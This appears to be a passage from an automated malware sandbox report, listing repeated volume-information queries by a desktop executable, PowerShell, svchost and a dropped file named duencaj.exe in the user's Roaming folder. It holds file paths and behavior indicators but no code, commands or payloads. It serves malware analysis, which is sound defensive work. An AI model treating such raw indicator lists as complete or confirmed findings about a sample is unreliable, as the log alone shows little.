Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Users\user\AppData\Roaming\duencaj.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Users\user\AppData\Roaming\duencaj.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
